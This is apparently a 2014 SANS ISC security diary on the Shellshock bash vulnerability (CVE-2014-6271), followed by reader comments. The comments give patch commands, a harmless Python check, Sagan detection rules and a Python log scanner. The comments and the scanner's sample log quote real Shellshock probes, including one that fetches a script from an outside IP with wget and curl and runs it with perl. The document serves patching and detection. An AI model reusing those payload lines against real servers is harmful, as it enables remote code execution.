Over the past years, we became used to Microsoft patches, the important, critical ones that would render your system fully vulnerable if you didn't apply them. We probably became so used to them that sometimes we forget that our Linux servers also need patches. Today I've learned about a critical Bash patch that addresses CVE-2014-6271. According to the advisory: "A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue." The patches are already available for most of the Linux distros, like Red Hat and Debian, so waste no time.

--- Pedro Bueno (pbueno /%%/ isc. sans. org)
Pedro, ISC Handler, Sep 24th 2014
The good news is that it's an easy fix:
Debian (Ubuntu, etc.):
    apt-get upgrade bash    # run apt-get update first so the fixed package is visible
RHEL (Fedora, CentOS, etc.):
    yum update bash
da1212, Sep 24th 2014
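Added here as an example, not code from the diary or from any commenter: after applying the update, the standard way to confirm that bash no longer runs the command appended to an exported function definition (the flaw the diary quotes) is to hand bash a variable whose value starts with the same "() { :;};" prefix the scanners use but ends in a harmless echo. The helper names `bash_version` and `check_cve_2014_6271` are ours. This checks the original CVE-2014-6271 behaviour only; the incomplete-patch follow-up CVE-2014-7169 mentioned later in the thread needs the later update and is not covered by this test.

```python
import os
import shutil
import subprocess


def bash_version(bash):
    """Return the first line of `bash --version` (informational only; the
    behavioural check below is what actually decides)."""
    out = subprocess.run([bash, "--version"], capture_output=True, text=True).stdout
    return out.splitlines()[0] if out else ""


def check_cve_2014_6271(bash=None):
    """Return True if this bash still executes the command that follows an
    exported function definition (the original Shellshock bug), False if it
    does not, and None if no bash binary is available to test."""
    bash = bash or shutil.which("bash")
    if bash is None or not os.path.exists(bash):
        return None
    env = {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        # Same "() { :;};" prefix as the in-the-wild probes, harmless tail.
        "x": "() { :;}; echo vulnerable",
    }
    # A vulnerable bash runs `echo vulnerable` while importing x from the
    # environment; a patched one either warns on stderr and ignores the
    # trailing command, or treats x as an ordinary variable.
    proc = subprocess.run([bash, "-c", "echo test"], env=env,
                          capture_output=True, text=True)
    return "vulnerable" in proc.stdout


if __name__ == "__main__":
    b = shutil.which("bash")
    if b is None:
        print("no bash binary found")
    else:
        print(bash_version(b))
        if check_cve_2014_6271(b):
            print("VULNERABLE to CVE-2014-6271: update bash now")
        else:
            print("not vulnerable to CVE-2014-6271 (check CVE-2014-7169 separately)")
```

Run it once before and once after the package update; the version string alone is not a reliable indicator because distributions backport the fix without changing the upstream version number.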
We've created the first batch of Sagan (log analysis engine - http://sagan.io) signatures to detect this. These monitor bash history and Apache logs for attempts. More information can be found at:
https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4

Apache:
alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;)

Bash:
alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;)
da1212, Sep 24th 2014
Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.
https://access.redhat.com/articles/1200223
Anonymous, Sep 25th 2014
Red Hat provided an update indicating the patches are not complete and a new CVE has been assigned (CVE-2014-7169); more here:
https://access.redhat.com/articles/1200223
Anonymous, Sep 25th 2014
We've just started seeing scanning traffic using the following packet contents:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*

This also appears to be using spoofed source IPs. No logs at this time.
sludge3000, Sep 25th 2014
You can't spoof a TCP payload. I've seen the above attacks from 89.207.135.125, which is (to me) obviously a host for malware sites and this sort of activity.
It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. It wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by.)
Steven C., Sep 25th 2014
Examples from my webserver log:
89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

Shouldn't this rate setting the Threat Level to at least chartreuse?
John Hardin, Sep 25th 2014
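As an added example, not code from the thread or from the Sagan project, the following Python scanner applies the idea behind the Sagan Apache signature posted earlier to raw Apache combined-format access logs such as the ones John Hardin shows: it looks for the "() {" function-definition prefix in the request line, the referer and the user-agent (the three fields a CGI handler exports into the environment as REQUEST_URI, HTTP_REFERER and HTTP_USER_AGENT) and reports which field carried it and what command followed the function body. It is more general than the "() { :;}" byte match in the signature, since any function body is flagged. The sample log is the two lines from the thread plus one constructed benign request; the `Hit` type and function names are ours.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Apache "combined" log format. The request line, referer and user-agent are
# the fields mod_cgi turns into environment variables, which is how a
# Shellshock payload reaches bash; the agent field may contain \" escapes.
COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Shellshock marker: an exported-function definition "() { ... }" followed by
# whatever the sender wants bash to run when it imports the variable. Covers
# the "() { :;}" seen in the thread (Sagan's |28 29| { |3a 3b|} content) and
# any other function body.
FUNC_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<payload>.*)$')


@dataclass
class Hit:
    src: str        # client address from the log line
    timestamp: str  # Apache timestamp
    field: str      # field that carried the marker: request, referer or agent
    payload: str    # the command that followed the function body


def scan_line(line: str) -> Optional[Hit]:
    """Return a Hit if the line carries a function-definition marker, else None."""
    m = COMBINED_RE.match(line)
    if m is None:
        return None
    for field in ("request", "referer", "agent"):
        fm = FUNC_RE.search(m.group(field))
        if fm is not None:
            return Hit(m.group("src"), m.group("ts"), field,
                       fm.group("payload").strip())
    return None


def scan_log(lines: Iterable[str]) -> List[Hit]:
    """Scan an iterable of log lines and collect every hit, in order."""
    return [hit for hit in (scan_line(line) for line in lines) if hit is not None]


# Constructed sample: the two lines posted in the thread plus one benign request.
SAMPLE_LOG = r'''89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""
10.0.0.1 - - [25/Sep/2014:09:00:00 -0700] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{hit.timestamp}  {hit.src:<16} via {hit.field:<8} -> {hit.payload}")
```

Pointing `scan_log` at a real access log (for example, `scan_log(open("/var/log/apache2/access.log"))`) gives the source address and the injected command for each probe, which is what you need for blocking and for deciding whether a 404 was harmless or whether a CGI script actually existed at that path. Note that the second sample line downloads and runs a script rather than just pinging, which is why a hit against an existing CGI path warrants an incident-response look rather than only a firewall entry.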